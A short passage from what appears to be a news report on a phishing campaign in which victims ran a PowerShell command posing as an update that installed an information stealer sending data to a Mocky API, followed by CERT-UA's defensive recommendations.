Upon falling for the ruse, victims were instructed by the hackers to execute a PowerShell command, purportedly for device updates. However, instead of genuine updates, the command downloaded a sophisticated information-stealing malware. This malicious software exploited the “tasklist” and “systeminfo” commands to extract sensitive data, which it subsequently sent to a Mocky service API via an HTTP request.
To combat this evolving threat, CERT-UA recommends that IT departments within government institutions limit the ability to run PowerShell commands on critical devices and remain vigilant in monitoring network traffic for any suspicious activity, especially connections to the Mocky service API.
